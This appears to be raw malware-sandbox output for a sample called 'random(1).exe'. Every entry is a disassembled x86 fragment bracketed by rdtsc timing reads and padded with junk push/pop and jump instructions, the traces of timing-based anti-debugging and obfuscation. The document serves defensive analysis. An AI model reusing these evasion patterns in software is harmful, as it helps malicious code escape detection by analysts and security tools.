              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B72A3 second address: 10B72C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jc 00007F06D8B4D9E3h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F06D8B4D9D5h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B7459 second address: 10B7469 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06D8518546h 0x00000008 jnp 00007F06D8518546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B7469 second address: 10B746E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B746E second address: 10B747A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10B75F7 second address: 10B7614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9D2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10BC394 second address: 10BC398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10BC515 second address: 10BC549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F06D8B4D9C6h 0x0000000a jmp 00007F06D8B4D9D2h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jnp 00007F06D8B4D9D2h 0x00000018 jmp 00007F06D8B4D9CAh 0x0000001d push edx 0x0000001e pop edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10BC549 second address: 10BC551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10BBAB6 second address: 10BBABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10BBABA second address: 10BBACE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F06D851854Eh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10BBACE second address: 10BBB05 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F06D8B4D9D2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F06D8B4D9D6h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10BBB05 second address: 10BBB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10BC870 second address: 10BC874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10BC874 second address: 10BC889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jns 00007F06D8518546h 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10BCB20 second address: 10BCB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10BCB28 second address: 10BCB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007F06D851854Ah 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10BCE11 second address: 10BCE15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108EC7B second address: 108EC8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108EC8D second address: 108EC93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108EC93 second address: 108EC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108EC97 second address: 108EC9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108EC9B second address: 106B72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F06D8518548h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 call dword ptr [ebp+122D281Dh] 0x0000002b jmp 00007F06D8518559h 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108EE30 second address: 108EE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108F244 second address: 108F248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108F248 second address: 108F256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F06D8B4D9CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108F466 second address: 108F48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007F06D8518548h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 jnl 00007F06D851854Ch 0x00000016 jo 00007F06D851854Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108F687 second address: 108F6B6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F06D8B4D9C8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, 48FEDA1Ch 0x00000014 push 00000004h 0x00000016 mov edx, dword ptr [ebp+122D2B63h] 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F06D8B4D9CEh 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108F6B6 second address: 108F6BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108F6BA second address: 108F6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108F6C0 second address: 108F6C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108F6C6 second address: 108F6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108FA04 second address: 108FA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 js 00007F06D8518556h 0x0000000b jmp 00007F06D8518550h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F06D8518548h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D215Ah], eax 0x00000031 push 0000001Eh 0x00000033 push edi 0x00000034 xor dword ptr [ebp+122D36F3h], eax 0x0000003a pop ecx 0x0000003b nop 0x0000003c push esi 0x0000003d push eax 0x0000003e push edx 0x0000003f push ecx 0x00000040 pop ecx 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108FA58 second address: 108FA66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108FDC6 second address: 108FE88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518558h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F06D851854Ah 0x0000000f nop 0x00000010 jmp 00007F06D851854Dh 0x00000015 lea eax, dword ptr [ebp+124929EEh] 0x0000001b jns 00007F06D8518560h 0x00000021 push eax 0x00000022 jmp 00007F06D8518551h 0x00000027 mov dword ptr [esp], eax 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F06D8518548h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 mov dword ptr [ebp+12453EE4h], esi 0x0000004a add edx, 371AEF37h 0x00000050 lea eax, dword ptr [ebp+124929AAh] 0x00000056 nop 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F06D8518559h 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C0AB2 second address: 10C0AD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CEh 0x00000007 jmp 00007F06D8B4D9D1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C0AD5 second address: 10C0AEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518555h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C0AEF second address: 10C0B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F06D8B4D9C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jl 00007F06D8B4D9E2h 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C0B07 second address: 10C0B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F06D8518546h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C0B14 second address: 10C0B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108F231 second address: 108F235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 108F235 second address: 108F244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C0D52 second address: 10C0D6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C0D6B second address: 10C0D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C0D6F second address: 10C0D75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C0D75 second address: 10C0D94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 jmp 00007F06D8B4D9CCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C0D94 second address: 10C0D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C0D99 second address: 10C0DAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CAh 0x00000007 js 00007F06D8B4D9CEh 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C13C5 second address: 10C13FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F06D8518550h 0x00000019 jmp 00007F06D8518551h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C13FA second address: 10C1408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F06D8B4D9C8h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C1575 second address: 10C158F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F06D8518546h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F06D851854Ch 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C158F second address: 10C15B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9CDh 0x00000009 jmp 00007F06D8B4D9D0h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C94BA second address: 10C94C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C94C0 second address: 10C94CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F06D8B4D9CAh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C94CF second address: 10C94DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F06D8518546h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C98B1 second address: 10C98B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C98B8 second address: 10C98BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C9A03 second address: 10C9A0E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C9A0E second address: 10C9A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C9DE3 second address: 10C9DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C9DE9 second address: 10C9DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C9DEF second address: 10C9DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10C9F56 second address: 10C9F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8518550h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10CF571 second address: 10CF57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F06D8B4D9C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10CF57B second address: 10CF585 instructions: 0x00000000 rdtsc 0x00000002 js 00007F06D8518546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10D1E73 second address: 10D1E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10D1E79 second address: 10D1E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518558h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10D1E97 second address: 10D1EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F06D8B4D9C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10D1EA3 second address: 10D1EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10D2038 second address: 10D203C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10D2192 second address: 10D219D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F06D8518546h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10D979D second address: 10D97B8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F06D8B4D9CEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F06D8B4D9C6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10D9EBA second address: 10D9EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10D9EBE second address: 10D9EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F06D8B4D9D8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F06D8B4D9CFh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10D9EF3 second address: 10D9F2A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F06D8518546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F06D851854Ch 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F06D8518559h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10D9F2A second address: 10D9F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10DA0D0 second address: 10DA0D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10DD703 second address: 10DD707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10DD707 second address: 10DD715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F06D851854Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10DD715 second address: 10DD720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10DD720 second address: 10DD754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F06D8518553h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F06D851854Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F06D851854Bh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10DCD50 second address: 10DCD54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10DD01B second address: 10DD025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F06D8518546h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10DD025 second address: 10DD03D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10DD03D second address: 10DD068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D8518555h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10DD068 second address: 10DD06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10DD3E2 second address: 10DD405 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Ch 0x00000007 jmp 00007F06D8518550h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10DD405 second address: 10DD40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10DD40B second address: 10DD428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8518558h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10DD428 second address: 10DD441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9D3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10DD441 second address: 10DD445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(1).exeRDTSC instruction interceptor: First address: 10E1FCB second address: 10E1FD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
